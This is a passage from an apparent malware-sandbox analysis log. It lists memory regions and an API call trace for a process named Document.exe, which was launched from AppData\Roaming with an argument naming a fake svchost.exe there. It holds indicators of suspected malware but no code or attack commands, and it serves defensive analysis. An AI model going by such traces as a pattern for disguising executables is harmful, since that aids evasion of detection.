private name = "private_0x000000007efd8000" filename = "" Region: id = 1057 start_va = 0x75640000 end_va = 0x7567afff entry_point = 0x75640000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1058 start_va = 0x75950000 end_va = 0x7595dfff entry_point = 0x75950000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1059 start_va = 0x2a80000 end_va = 0x2abffff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 1060 start_va = 0x2ac0000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 1061 start_va = 0x2bc0000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 1062 start_va = 0x2c00000 end_va = 0x2cfffff entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1063 start_va = 0x2d00000 end_va = 0x2d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1064 start_va = 0x2d80000 end_va = 0x2e3ffff entry_point = 0x2d80000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1065 start_va = 0x2e80000 end_va = 0x2ebffff entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 1066 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1067 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1068 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 67 os_tid = 0xbdc Thread: id = 68 os_tid = 0xbe0 Thread: id = 69 os_tid = 0xbe4 Thread: id = 70 os_tid = 0xbe8 Thread: id = 71 os_tid = 0xbec Process: id = "6" image_name = "document.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe" page_root = "0x55e0f000" os_pid = "0x818" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xbcc" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 1 \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" 1159BD3" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1163 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1164 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1165 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1166 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1167 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1168 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1169 start_va = 0x400000 end_va = 0x4b2fff entry_point = 0x400000 region_type = mapped_file name = "document.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe") Region: id = 1170 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1171 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1172 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1173 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1174 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1175 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1176 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1177 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1178 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1179 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1180 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1181 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1182 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1183 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1184 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1185 start_va = 0x380000 end_va = 0x3e6fff entry_point = 0x380000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1186 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1187 start_va = 0x74ba0000 end_va = 0x74ba8fff entry_point = 0x74ba0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1188 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1189 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1190 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1191 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1192 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1193 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1194 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1195 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1196 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1197 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1198 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1199 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1200 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1201 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1202 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1203 start_va = 0x77780000 end_va = 0x777fafff entry_point = 0x77780000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1204 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1205 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1206 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1207 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1208 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1209 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1210 start_va = 0x640000 end_va = 0x7c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1211 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1212 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1269 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1270 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1271 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1272 start_va = 0x7d0000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1273 start_va = 0x960000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1274 start_va = 0x1d60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1277 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1278 start_va = 0x1e60000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1282 start_va = 0x540000 end_va = 0x61efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1283 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1284 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1285 start_va = 0x4c0000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1286 start_va = 0x2000000 end_va = 0x292ffff entry_point = 0x2000000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1287 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1288 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1289 start_va = 0x2930000 end_va = 0x2d22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002930000" filename = "" Region: id = 1290 start_va = 0x2d30000 end_va = 0x2465ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 1297 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1298 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1299 start_va = 0x2d30000 end_va = 0xad30fff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 1303 start_va = 0x4c0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1304 start_va = 0x4f0000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1305 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1306 start_va = 0x3f0000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1307 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1308 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1309 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1310 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1311 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1312 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1313 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1314 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1315 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1316 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1317 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1318 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1319 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1320 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1321 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1322 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1323 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1324 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1325 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1326 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1327 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1328 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1329 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1330 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1331 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1332 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1333 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1334 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1335 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1336 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1337 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1338 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1339 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1340 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1341 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1342 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1343 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1344 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1345 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1346 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1347 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1348 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1349 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1350 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1351 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1352 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1353 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1354 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1355 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1356 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1357 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1358 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1359 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1360 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1361 start_va = 0x270000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Thread: id = 72 os_tid = 0x820 [0165.630] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0165.637] GetKeyboardType (nTypeFlag=0) returned 4 [0165.638] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 1 \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" 1159BD3" [0165.638] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0165.638] GetVersion () returned 0x1db10106 [0165.638] GetVersion () returned 0x1db10106 [0165.638] GetCurrentThreadId () returned 0x820 [0165.638] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.638] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0165.638] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0165.638] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0165.638] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0165.639] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" [0165.639] GetThreadLocale () returned 0x409 [0165.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0165.640] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 55 [0165.640] lstrcpynA (in: lpString1=0x18f907, lpString2="ENU", iMaxLength=209 | out: lpString1="ENU") returned="ENU" [0165.640] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0165.640] lstrcpynA (in: lpString1=0x18f907, lpString2="EN", iMaxLength=209 | out: lpString1="EN") returned="EN" [0165.640] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0165.640] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0165.640] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x296400 [0165.640] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1d60000 [0165.640] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x297400 [0165.640] VirtualAlloc (lpAddress=0x1d60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d60000 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0165.641] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0165.641] LoadStringA (in: hInstance=0x400000, 